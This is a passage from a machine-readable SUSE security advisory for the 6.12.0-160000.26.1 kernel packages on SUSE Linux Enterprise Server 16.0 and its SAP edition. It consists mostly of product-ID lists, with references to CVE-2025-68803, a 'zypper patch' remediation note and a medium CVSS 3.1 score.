"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68803",
"url": "https://www.suse.com/security/cve/CVE-2025-68803"
},
{
"category": "external",
"summary": "SUSE Bug 1256770 for CVE-2025-68803",
"url": "https://bugzilla.suse.com/1256770"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
